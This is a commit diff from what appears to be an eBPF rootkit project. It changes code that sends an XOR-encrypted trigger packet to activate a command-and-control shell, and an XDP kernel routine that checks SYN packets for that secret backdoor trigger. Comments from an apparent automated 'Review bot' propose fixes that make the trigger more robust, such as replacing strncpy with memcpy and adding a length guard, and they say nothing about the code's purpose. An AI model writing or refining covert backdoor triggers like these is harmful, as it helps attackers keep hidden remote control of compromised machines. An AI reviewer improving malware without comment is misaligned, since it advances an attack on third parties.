Completed checks for V1 trigger

This commit is contained in:
h3xduck
2022-05-04 08:54:21 -04:00
parent 073a911f74
commit ead4a4ca68
8 changed files with 1685 additions and 1567 deletions





@@ -221,7 +221,7 @@ void activate_command_control_shell_encrypted(char* argv){
strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii] ^ key2[ii];
result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
}
strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
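Review bot: The three `strncpy` calls in this hunk copy raw packet bytes as if they were C strings, so each copy stops at the first 0x00 byte in the section and zero-pads the remainder, silently altering the trigger bytes whenever a section or the XOR result contains a zero; the kernel side of this same commit reads those sections with `__builtin_memcpy`, so the two sides can disagree on exactly the packets that contain a zero byte. Replace them with `memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`, `memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);` and `memcpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`. activate_command_control_shell_encrypted starts before this hunk, so where section, section2, result and key3 are declared, and whether key3 is initialised before this loop, is not visible here.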




@@ -9,10 +9,13 @@
static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result1[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
//Undoing the trigger secret packet to check it is the one expected
@@ -25,16 +28,39 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
__builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii];
if(result[ii]!=key1[ii]){
bpf_printk("FAIL\n");
}
}
bpf_printk("Finished V1 check\n");
result1[ii] = section[ii] ^ section2[ii];
if(result1[ii]!=key1[ii]){
bpf_printk("FAIL CHECK 1\n");
return XDP_PASS;
}
}
//S2 XOR K2
__builtin_memcpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result2[ii] = section[ii] ^ section2[ii];
if(result2[ii]!=key2[ii]){
bpf_printk("FAIL CHECK 2\n");
return XDP_PASS;
}
}
//S1 XOR K1 XOR S2 XOR K2 XOR K3
__builtin_memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=key3[ii]){
bpf_printk("FAIL CHECK 3\n");
return XDP_PASS;
}
}
//If we reach this point then we received trigger packet
bpf_printk("Finished backdoor V1 check\n");
return XDP_DROP;
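Review bot: payload_size is a parameter of manage_backdoor_trigger_v1 but is never consulted anywhere in this hunk, while the copies at `payload+0x0A` and `payload+0x0C` read up to offset 0x0C + CC_TRIGGER_SYN_PACKET_SECTION_LEN; unless the caller already guarantees that length, a short SYN payload makes these reads run past the packet, which the BPF verifier will reject or, if the bound was proven elsewhere, is at least not evident from this code. Add an explicit guard ahead of the first check, `if (payload_size < 0x0C + CC_TRIGGER_SYN_PACKET_SECTION_LEN) return XDP_PASS;`, bearing in mind that the verifier will most likely need the bound expressed against data_end rather than a plain integer, which may already be done in the lines between the two hunks. The comment `//S1 XOR K1 XOR S2 XOR K2 XOR K3` does not describe the test under it, which checks `payload[0x06..] ^ payload[0x0A..] ^ payload[0x0C..] == key3`; rewrite it as `//S(0x06) XOR S(0x0A) XOR S(0x0C) must equal K3`. The function begins in the previous hunk, and the lines between the hunks where key1..key3 are presumably filled are not shown.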


@@ -55,8 +55,8 @@ SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx){
//bpf_printk("BPF triggered\n");
void *data_end = (void *)(__u32)ctx->data_end;
void *data = (void *)(__u32)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data;
unsigned int payload_size;
struct ethhdr *eth = data;